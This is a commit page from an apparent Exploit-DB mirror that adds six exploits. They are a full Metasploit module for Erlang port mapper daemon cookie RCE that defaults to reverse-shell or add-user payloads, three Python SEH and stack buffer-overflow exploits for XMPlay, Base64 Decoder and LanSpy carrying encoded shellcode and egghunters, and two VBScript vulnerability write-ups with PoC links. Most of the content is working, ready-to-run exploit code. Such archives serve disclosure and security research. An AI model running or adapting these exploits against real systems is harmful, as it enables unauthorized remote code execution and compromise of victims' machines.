bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-12-21

Browse source 
6 changes to exploits/shellcodes

VBScript - VbsErase Reference Leak Use-After-Free
VBScript - MSXML Execution Policy Bypass
LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)
XMPlay 3.8.3 - '.m3u' Local Stack Overflow Code Execution
Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)

Erlang - Port Mapper Daemon Cookie RCE (Metasploit)
This commit is contained in:
Offensive Security 2018-12-21 05:01:52 +00:00
parent aedf107ce9
commit 1ddc5edd5d
7 changed files with 518 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

156
exploits/multiple/remote/46024.rb Executable file
View file

@ -0,0 +1,156 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Erlang Port Mapper Daemon Cookie RCE',
'Description' => %q{
The erlang port mapper daemon is used to coordinate distributed erlang instances.
Should an attacker get the authentication cookie RCE is trivial. Usually, this
cookie is named ".erlang.cookie" and varies on location.
},
'Author' =>
[
'Daniel Mende', # blog post article
'Milton Valencia (wetw0rk)', # metasploit module
],
'References' =>
[
['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']
],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'win'],
'Arch' => ARCH_CMD,
'Privileged' => 'false',
'Targets' =>
[
[ 'Unix',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
],
[ 'Windows',
'Platform' => 'win',
'Arch' => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'},
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 20, 2009', # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history)
)
)
register_options(
[
OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),
Opt::RPORT(25672)
])
end
def generate_challenge_digest(challenge)
challenge = challenge.unpack('H*')[0].to_i(16).to_s
hash = Digest::MD5.new
hash.update(datastore['COOKIE'])
hash.update(challenge)
vprint_status("MD5 digest generated: #{hash.hexdigest}")
return [hash.hexdigest].pack('H*')
end
def exploit
connect
our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
# SEND_NAME: send initial identification of who "we" are
send_name = "\x00" # Length: 0x0000
send_name << [(our_node.length+7).to_s(16)].pack('H*') #
send_name << "\x6e" # Tag: n
send_name << "\x00\x05" # Version: R6 (5)
send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c)
send_name << "#{our_node}" # <generated>@<generated>
# SEND_CHALLENGE_REPLY: return generated digest and its own challenge
send_challenge_reply = "\x00\x15" # Length: 21
send_challenge_reply << "\x72" # Tag: r
# SEND: send the message to the node
send = "\x00\x00\x00" # Length:0x00000000
send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') #
send << "\x70" #
send << "\x83" # VERSION_MAGIC
send << "\x68" # SMALL_TUPLE_EXT (104)
send << "\x04" # Arity: 4
send << "\x61" # SMALL_INTEGER_EXT
send << "\x06" # Int: 6
send << "\x67" # PID_EXT (103)
send << "\x64\x00" # Node:
send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
send << "#{our_node}" # Node
send << "\x00\x00\x00\x03" # ID
send << "\x00\x00\x00\x00" # Serial
send << "\x00" # Creation
send << "\x64" # InternalSegmentIndex
send << "\x00\x00" # Len: 0x0000
send << "\x64" # InternalSegmentIndex
send << "\x00\x03" # Length: 3
send << "rex" # AtomText: rex
send << "\x83\x68\x02\x67\x64\x00" #
send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
send << "#{our_node}" # Node
send << "\x00\x00\x00\x03" # ID
send << "\x00\x00\x00\x00" # Serial
send << "\x00" # Creation
send << "\x68" # SMALL_TUPLE_EXT (104)
send << "\x05" # Arity: 5
send << "\x64" # InternalSegmentIndex
send << "\x00\x04" # Length: 4
send << "call" # AtomText: call
send << "\x64" # InternalSegmentIndex
send << "\x00\x02" # Length: 2
send << "os" # AtomText: os
send << "\x64" # InternalSegmentIndex
send << "\x00\x03" # Length: 3
send << "cmd" # AtomText: cmd
send << "\x6c" # LIST_EXT
send << "\x00\x00\x00\x01" # Length: 1
send << "\x6b" # Elements: k
send << "\x00" # Tail
send << [(payload.raw.length).to_s(16)].pack('H*') # strlen(Command)
send << payload.raw # Command
send << "\x6a" # NIL_EXT
send << "\x64" # InternalSegmentIndex
send << "\x00\x04" # Length: 4
send << "user" # AtomText: user
sock.put(send_name)
# recieve servers "SEND_CHALLENGE" token (4 bytes)
print_status("Receiving server challenge")
challenge = sock.get
challenge = challenge[14,4]
send_challenge_reply << challenge
send_challenge_reply << generate_challenge_digest(challenge)
print_status("Sending challenge reply")
sock.put(send_challenge_reply)
if sock.get.length < 1
fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore['COOKIE']}")
end
print_good("Authentication successful, sending payload")
sock.put(send)
end
end

60
exploits/windows/dos/46022.txt Normal file
View file

@ -0,0 +1,60 @@
There is an reference leak in Microsoft VBScript that can be turned into an use-after-free given sufficient time. The vulnerability has been confirmed in Internet Explorer on various Windows versions with the latest patches applied.
Details:
VbsErase function is used to reset and free the contents of a VBScript array. When this function is called on a VBScript variable of the type array (implemented as a VAR structure containing a type followed by a value, in this case a pointer to a SafeArray object), the function follows these steps:
1. Get the pointer to a SafeArray object from the VBScript variable and store it locally
2. Set the pointer value in the VBScript variable to 0 (null)
3. Release the array members (by calling SafeArrayDestroyData)
4. Restore the pointer from step 2
5. Destroy the array object itself (by calling SafeArrayDestroyDescriptor)
6. Once again, set the pointer value in the VBScript variable to null
The dance with setting the pointer to null and restoring it was made to address previously reported vulnerabilities described in http://blogs.360.cn/post/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day.html.
However, this also introduced another bug. Specifically, if during SafeArrayDestroyData a user-defined callback runs, the callback can set the value of the VBScript variable passed to VbsErase to some other object (which increases the reference count of the object). If that happens, in steps 4 and 6 above, the pointer to the object will be overwritten, thus preventing its reference count to get properly decremented when the VBScript variable is assigned some other value.
Consider the following code snippet:
====================================
Class class1
End Class
Class class2
Private Sub Class_Terminate()
' increase the reference count of c
set a = c
End Sub
End Class
' create an object of class1 and increase its reference count
c = new class1
a = Array(0)
set a(0) = new class2
' call Class_Terminate of class2
Erase a
' a has been set to null so the following line doesn't affect c in any way
a = 1
' decrease the reference count of c
c = 1
' at this point the referenc couter of c is 1 instead of 0
====================================
When the code snippet finishes, the class1 object createad on the first line continues to live, even though all references to it have been lost so it should have been destroyed. This same principle can be used to increase the reference count of an arbitrary object any number of times without incurring a memory cost, eventually overflowing the 32-bit reference counter.
Note that, while custom classes in VBScript have protection against overflowing a reference counter, this isn't the case for built-in objects (compare VBScriptClass::AddRef to AddRef methods of other classes). Because of this, the PoCs below use a RegExp object.
The only problem is that for every reference counter increment, a new array has to be created and destroyed and a user-defined Class_Terminate needs to run which all takes time. Overflowing the 32-bit reference counter can take around 2 hours (depending on the CPU) and way longer if page heap is enabled for the iexplore.exe process.
leak1.html (in attachment) contains the full PoC and leak1.txt contains a debug log for this.
If you don't want to wait, a quicker way to demonstrate the issue is to just run the reference counter increase for certain number of iterations, and then increase it further (close to overflowing) via a debugger.
leak2.html demonstrates this and leak2.txt contains the debug log (obtained in a 64 bit process with page heap enabled).
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46022.zip

11
exploits/windows/dos/46023.txt Normal file
View file

@ -0,0 +1,11 @@
According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, Starting from Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled for websites in the Internet Zone and the Restricted Sites Zone by default.
However, the VBScript execution policy does not appear to cover VBScript code in MSXML xsl files which can still execute VBScript, even when loaded from the Internet Zone.
To demonstrate, place the files in the attached archive on a web server in the Internet zone and open index.html. If successful, the text "Hello from VBscript" will be rendered on the page. If you look at the provided code, this text is assembled dynamically by VBScript.
This has been tested on Windows 10 Version 1803 with the latest patches applied and VBScript execution policy applied for the Internet Zone (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\140C = 3).
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46023.zip

82
exploits/windows/local/46020.py Executable file
View file

@ -0,0 +1,82 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: XMPlay 3.8.3 - '.m3u' Code Execution (PoC)
# Date: 2018-12-19
# Exploit Author: s7acktrac3
# Vendor Homepage: https://www.xmplay.com/
# Software Link: https://support.xmplay.com/files_view.php?file_id=676
# Version: 3.8.3 (latest)
# Tested on: Windows XP SP3
# CVE : Reserved
#
# Developer notified & delivered PoC but not interested in fixing :P
#
# Reproduction Steps:
# Lauch XMPlay & run this PoC script - it will create a file in the same directory named xmplay.m3u
# Either drag xmplay.m3u into the XMPlay window or File Menu-> select winamp.m3u. Application will "load"
# for a minute (exploit searching through memory for payload) and eventually launch calc.exe
#
# Major Shouts @Gokhan @foolsofsecurity for helping turn the DoS into Code execution & me into more of a
# beast!
from struct import pack
max_size = 728
# C:\Documents and Settings\Administrator\Desktop\Exploit Dev\xmplay_383-poc.py
eip_offset = 500
file_header = "#EXTM3U\n\r"
file_header += "#EXTINF:200,Sleep Away\n\r"
file_header += "http://test."
# cat egghunter.txt | tr -d '"' | tr -d '\n' | tr -d '\\x' | xxd -r -p > egghunter.bin
# msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows
encoded_egg_hunter = (""
"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
"\x38\x41\x42\x75\x4a\x49\x62\x46\x6f\x71\x4b\x7a\x49\x6f\x44"
"\x4f\x53\x72\x36\x32\x61\x7a\x46\x62\x66\x38\x78\x4d\x64\x6e"
"\x75\x6c\x75\x55\x63\x6a\x54\x34\x68\x6f\x6d\x68\x63\x47\x34"
"\x70\x54\x70\x72\x54\x4e\x6b\x58\x7a\x4e\x4f\x42\x55\x6b\x5a"
"\x4c\x6f\x31\x65\x78\x67\x59\x6f\x39\x77\x41\x41")
encoded_calc = "w00tw00t" + "\x57\x58\x04\x06\x50\x5E" # PUSH EDI, POP EAX, ADD AL,6, PUSH EAX, POP ESI
encoded_calc += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49"
encoded_calc += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
encoded_calc += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
encoded_calc += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
encoded_calc += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
encoded_calc += "\x4a\x49\x36\x51\x49\x59\x52\x71\x61\x78"
encoded_calc += "\x75\x33\x50\x61\x72\x4c\x31\x73\x73\x64"
encoded_calc += "\x6e\x58\x49\x57\x6a\x33\x39\x52\x64\x37"
encoded_calc += "\x6b\x4f\x38\x50\x41\x41"
egg_addr_to_edx = ""
egg_addr_to_edx += "\x54" # PUSH ESP
egg_addr_to_edx += "\x58" # POP EAX
egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C
egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C
egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C
egg_addr_to_edx += "\x50" # PUSH eax
egg_addr_to_edx += "\x5A" # POP EDX
payload = "A" * 12
payload += encoded_calc
payload += "A" * (eip_offset - len(payload))
print "Length of payload " + str(len(payload))
payload += pack("<L", 0x78196d4d) # Jmp esp OS DLL
payload += "BBBB"
payload += egg_addr_to_edx
payload += "C" * (76 - len(egg_addr_to_edx) )
payload += encoded_egg_hunter
payload += "C" * (max_size - len(payload))
stupid_char = "|"
print "[+] Creating .m3u file with payload size: "+ str(len(payload))
exploit = file_header + payload + stupid_char
file = open('xmplay.m3u','w')
file.write(exploit)
file.close();
print "[+] Done creating the file"

77
exploits/windows/local/46021.py Executable file
View file

@ -0,0 +1,77 @@
#!/usr/bin/env python
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)
# Date: 12-20-18
# Vulnerable Software: Base64 Decoder 1.1.2
# Vendor Homepage: http://4mhz.de/b64dec.html
# Version: 1.1.2
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Tested Windows 7 SP1 x86
# PoC
# 1. run script
# 2. copy/paste base.txt contents into 'save to file' section of app
# 3. select decode
# 4. pop calc
# orig dos poc from UN_NON, EDB: 39070
import struct
junk3 = "\x41" * 90
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")
junk2 = "\xcc"*50
#jump to calc
jmp3 = "\xe9\xaf\xfd\xff\xff\xcc"
junk1 = "\xcc"*20
#jump to jmp3
jmp2 = "\xeb\xe4\xcc\xcc\xcc\xcc"
#jump to jmp2
jmp1 = "\xeb\xf8\xcc\xcc"
#0x0045241e : pop esi # pop ebx # ret
seh = struct.pack('<L',0x0045241e)
buffer = junk3 + calc + junk2 + jmp3 + junk1 + jmp2 + jmp1 + seh
with open("base.txt","wb") as f:
f.write(buffer[:-1])

126
exploits/windows_x86/local/46018.py Executable file
View file

@ -0,0 +1,126 @@
# Exploit Title: LanSpy 2.0.1.159 - Local Buffer Overflow (SEH) (Egghunter)
# Exploit Author: bzyo
# Date: 12-19-18
# Twitter: @bzyo_
# Vulnerable Software: LanSpy 2.0.1.159
# Vendor Homepage: https://lizardsystems.com
# Version: 2.0.1.159
# Software Link 1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe
# Software Link 2: https://lizardsystems.com/download/lanspy_setup.exe
# Tested Windows 7 SP1 x86
# PoC
# 1. run script
# 2. copy/paste calcpayload.txt contents into scan section of app
# 3. remove previous search contents
# 4. copy/paste egghpayload.txt contents into scan section of app
# 5. wait for egg to be found
# 6. pop calc
# was working on this when i saw seh poc published
# submitting for the lulz
# original dos poc from Gionathan "John" Reale, EDB: 45968
# original seh poc from Juan Prescotto, EDB: 46009
#badchars; 0's 1's and 20; maybe more?
#!/usr/bin/python
import struct
file1="calcpayload.txt"
file2="egghpayload.txt"
#egghunter payload
junk3 = "A"*506
#125 bytes encoded egghunter 'BZYO'
#msfvenom -p generic/custom PAYLOADFILE=eggh -e x86/alpha_mixed -f python
eggh = ""
eggh += "\x89\xe5\xdd\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
eggh += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
eggh += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
eggh += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
eggh += "\x50\x38\x41\x42\x75\x4a\x49\x62\x46\x6e\x61\x6b\x7a"
eggh += "\x39\x6f\x34\x4f\x71\x52\x76\x32\x63\x5a\x45\x52\x63"
eggh += "\x68\x6a\x6d\x54\x6e\x37\x4c\x54\x45\x31\x4a\x30\x74"
eggh += "\x78\x6f\x78\x38\x42\x6f\x50\x59\x43\x6a\x53\x72\x6c"
eggh += "\x4b\x68\x7a\x6e\x4f\x31\x65\x4a\x4a\x6e\x4f\x31\x65"
eggh += "\x4b\x57\x6b\x4f\x6b\x57\x41\x41"
#jump to eggh
jmp2 = "\xe9\x30\xff\xff\xff"
junk2 = "\xcc"*6
#jump to jmp2
jmp1 = "\xcc\xcc\xeb\xf1\xcc\xcc"
junk1 = "\xcc"*16
#jump to jmp1
nseh = "\xeb\xea\xcc\xcc"
#0x00458148 : pop ecx # pop ebp # ret 0x04
seh = struct.pack('<L',0x00458148)
#10 nops
nops = "\x90"*10
egghpayload = junk3 + nops + eggh + nops + jmp2 + junk2 + jmp1 + junk1 + nseh + seh
#calc payload
calcjunk1 = "D"*26
#8 byte egg
bzyo = "OYZBOYZB"
#440 bytes for calc
#msfvenom -p windows/exec CMD="calc" -e x86/alpha_mixed -f python
calc = ""
calc += "\x89\xe2\xdd\xc5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49"
calc += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
calc += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
calc += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
calc += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x58\x68\x6f"
calc += "\x72\x63\x30\x53\x30\x55\x50\x45\x30\x4b\x39\x79\x75"
calc += "\x54\x71\x39\x50\x33\x54\x4e\x6b\x52\x70\x66\x50\x6c"
calc += "\x4b\x73\x62\x34\x4c\x4c\x4b\x71\x42\x32\x34\x4c\x4b"
calc += "\x71\x62\x47\x58\x34\x4f\x4e\x57\x62\x6a\x46\x46\x35"
calc += "\x61\x6b\x4f\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x74\x42"
calc += "\x76\x4c\x71\x30\x4f\x31\x68\x4f\x76\x6d\x77\x71\x7a"
calc += "\x67\x5a\x42\x58\x72\x56\x32\x32\x77\x4c\x4b\x43\x62"
calc += "\x52\x30\x6e\x6b\x30\x4a\x67\x4c\x4c\x4b\x50\x4c\x34"
calc += "\x51\x44\x38\x49\x73\x50\x48\x35\x51\x5a\x71\x76\x31"
calc += "\x6c\x4b\x66\x39\x37\x50\x33\x31\x78\x53\x6c\x4b\x53"
calc += "\x79\x57\x68\x69\x73\x56\x5a\x77\x39\x4e\x6b\x46\x54"
calc += "\x6c\x4b\x56\x61\x6a\x76\x30\x31\x4b\x4f\x4c\x6c\x49"
calc += "\x51\x48\x4f\x44\x4d\x47\x71\x59\x57\x65\x68\x4b\x50"
calc += "\x52\x55\x69\x66\x34\x43\x71\x6d\x4b\x48\x37\x4b\x63"
calc += "\x4d\x66\x44\x70\x75\x4b\x54\x63\x68\x4c\x4b\x70\x58"
calc += "\x31\x34\x75\x51\x4a\x73\x45\x36\x6e\x6b\x76\x6c\x42"
calc += "\x6b\x4e\x6b\x32\x78\x67\x6c\x57\x71\x59\x43\x4e\x6b"
calc += "\x47\x74\x4e\x6b\x45\x51\x68\x50\x4d\x59\x30\x44\x34"
calc += "\x64\x61\x34\x43\x6b\x31\x4b\x61\x71\x70\x59\x70\x5a"
calc += "\x70\x51\x6b\x4f\x79\x70\x61\x4f\x43\x6f\x42\x7a\x6e"
calc += "\x6b\x47\x62\x48\x6b\x4c\x4d\x31\x4d\x52\x4a\x77\x71"
calc += "\x4e\x6d\x6f\x75\x6e\x52\x53\x30\x65\x50\x57\x70\x30"
calc += "\x50\x50\x68\x50\x31\x6e\x6b\x52\x4f\x4f\x77\x39\x6f"
calc += "\x69\x45\x4f\x4b\x68\x70\x6f\x45\x39\x32\x36\x36\x52"
calc += "\x48\x4e\x46\x6c\x55\x6d\x6d\x4f\x6d\x49\x6f\x4a\x75"
calc += "\x57\x4c\x36\x66\x53\x4c\x35\x5a\x4f\x70\x49\x6b\x39"
calc += "\x70\x53\x45\x74\x45\x6f\x4b\x71\x57\x45\x43\x33\x42"
calc += "\x70\x6f\x52\x4a\x65\x50\x66\x33\x59\x6f\x7a\x75\x55"
calc += "\x33\x33\x51\x32\x4c\x65\x33\x33\x30\x41\x41"
calcjunk2 = "E"*30
calcpayload = calcjunk1 + bzyo + calc + calcjunk2
textfile = open(file1 , 'w')
textfile.write(calcpayload)
textfile.close()
textfile = open(file2 , 'w')
textfile.write(egghpayload)
textfile.close()

6
files_exploits.csv
View file

@ -6220,6 +6220,8 @@ id,file,description,date,author,type,platform,port
46002,exploits/windows/dos/46002.py,"AnyBurn 4.3 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
46003,exploits/windows/dos/46003.py,"Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
46004,exploits/windows/dos/46004.py,"MegaPing - Local Buffer Overflow Denial of Service",2018-12-18,Achilles,dos,windows,
46022,exploits/windows/dos/46022.txt,"VBScript - VbsErase Reference Leak Use-After-Free",2018-12-20,"Google Security Research",dos,windows,
46023,exploits/windows/dos/46023.txt,"VBScript - MSXML Execution Policy Bypass",2018-12-20,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10158,6 +10160,9 @@ id,file,description,date,author,type,platform,port
46008,exploits/windows/local/46008.py,"PassFab RAR 9.3.2 - Buffer Overflow (SEH)",2018-12-19,Achilles,local,windows,
46009,exploits/windows/local/46009.py,"LanSpy 2.0.1.159 - Local Buffer Overflow",2018-12-19,"Juan Prescotto",local,windows,
46016,exploits/windows/local/46016.py,"PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)",2018-12-19,Achilles,local,windows,
46018,exploits/windows_x86/local/46018.py,"LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)",2018-12-20,bzyo,local,windows_x86,
46020,exploits/windows/local/46020.py,"XMPlay 3.8.3 - '.m3u' Local Stack Overflow Code Execution",2018-12-20,s7acktrac3,local,windows,
46021,exploits/windows/local/46021.py,"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)",2018-12-20,bzyo,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17018,6 +17023,7 @@ id,file,description,date,author,type,platform,port
45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

Can't render this file because it is too large.